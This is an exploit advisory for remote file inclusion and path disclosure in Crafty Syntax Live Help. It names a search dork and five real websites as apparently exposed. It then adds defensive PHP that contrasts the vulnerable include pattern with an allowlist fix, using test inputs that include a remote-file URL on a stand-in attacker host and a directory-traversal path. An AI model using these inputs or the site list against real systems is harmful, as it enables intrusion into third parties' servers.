# Exploit Title : Crafty Syntax Live Help <= (2.*.* & 3.*.*) RFI + Path Disclosure
# Date : 4/19/2013
# Author : ITTIHACK
# Home : http://ittihack.com
# Vendor : http://www.craftysyntax.com
# Download : http://www.craftysyntax.com/craftysyntax3.4.1.zip
# Version : 2.* and 3.* , All versions
# Category : webapps
# Google dork : NA
# Tested on : Windows 7 + Apache server
# Description : Crafty Syntax Live Help is a live support application. Highlighted features include the ability to create your own questions, auto-inviting visitors, referrer tracking, page tracking and more.

===========================================================================

1) Remote File Include : admin.php

    if(!(isset($UNTRUSTED['page']))){ $UNTRUSTED['page'] = "scratch.php"; }

    http://localhost/path/admin.php?page=[RFI]

===========================================================================

2) Full Path Disclosure: xmlhttp.php

Dork: inurl:"/xmlhttp.php"

    Notice: Undefined index: whattodo in

http://www.roderickrowser.com/livehelp/xmlhttp.php
http://www.rupeemail.net/livehelp/xmlhttp.php
http://www.michaelroselli.com/cslh/xmlhttp.php
http://www.recomende.com/ajuda/xmlhttp.php
http://www.camilodossantos.com.br/suporte/xmlhttp.php
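Both findings come from the same root cause: request parameters are used without validation. The `page` value is only given a default when absent and is otherwise passed on to `include()`, so any string the client supplies selects the file (a remote URL when `allow_url_include` is on; a local path otherwise). The `xmlhttp.php` notice appears because `$_REQUEST['whattodo']` is read without an `isset()` check while `display_errors` is on, so PHP prints the script's absolute path into the response. The following is an added example, not Crafty Syntax code, showing the vulnerable selection pattern quoted above next to a hardened form: an allowlist mapping page names to files, a null-coalescing read of `whattodo` against a fixed set of actions, and constructed inputs to exercise both. Page names, action names and the `/var/www/livehelp/admin` base directory are assumptions for illustration.

```php
<?php
// Added example (not from the Crafty Syntax project). Page names, action
// names and the base directory below are assumptions for illustration.

// --- Vulnerable pattern as quoted in the advisory ---------------------------
// The array entry gets a default only when missing; anything the request
// supplies is returned unchanged and, in the application, reaches include().
function vulnerable_page_selection(array $untrusted): string
{
    if (!(isset($untrusted['page']))) {
        $untrusted['page'] = "scratch.php";
    }
    return $untrusted['page'];
}

// --- Hardened form: allowlist of known admin pages -------------------------
// The client-controlled string is only ever used as a lookup key; the file
// name that reaches include() always comes from this fixed table.
const ADMIN_PAGES = [              // assumed page names
    'scratch'  => 'scratch.php',
    'settings' => 'settings.php',
    'users'    => 'users.php',
];

function safe_page_selection(array $untrusted, string $baseDir): ?string
{
    $key = $untrusted['page'] ?? 'scratch';
    if (!is_string($key) || !array_key_exists($key, ADMIN_PAGES)) {
        return null;                 // unknown page: reject and log, do not include
    }
    return $baseDir . DIRECTORY_SEPARATOR . ADMIN_PAGES[$key];
}

// --- xmlhttp.php: no "Undefined index: whattodo" notice --------------------
// Reading a missing key emits a notice; with display_errors=On that notice
// carries the script's absolute path into the HTTP response. Read the key
// with a default and validate it against a fixed set of actions. In
// production also set display_errors=Off and log_errors=On in php.ini.
function whattodo(array $untrusted): string
{
    $action  = $untrusted['whattodo'] ?? '';
    $allowed = ['poll', 'send', 'close'];   // assumed action names
    return in_array($action, $allowed, true) ? $action : 'invalid';
}

// Demonstration with constructed request arrays (no real hosts involved).
$requests = [
    ['page' => 'http://attacker.invalid/x.txt'],  // remote URL as in the advisory
    ['page' => '../../config.php'],               // local path instead of a page name
    ['page' => 'settings'],                       // legitimate page key
    [],                                           // parameter absent
];
foreach ($requests as $r) {
    printf("%-36s vulnerable=%-32s safe=%s\n",
        var_export($r['page'] ?? null, true),
        vulnerable_page_selection($r),
        safe_page_selection($r, '/var/www/livehelp/admin') ?? 'REJECTED');
}
printf("whattodo missing -> %s\n", whattodo([]));
printf("whattodo=poll    -> %s\n", whattodo(['whattodo' => 'poll']));
```

Run it with `php example.php`: the vulnerable function echoes the attacker-controlled string back for every case, while the hardened function resolves only the allowlisted key and returns `null` for the remote URL and the traversal string. Setting `allow_url_include=Off` is a necessary server-side mitigation for the remote variant, but it does not remove the local-file variant of the same bug; only the allowlist does.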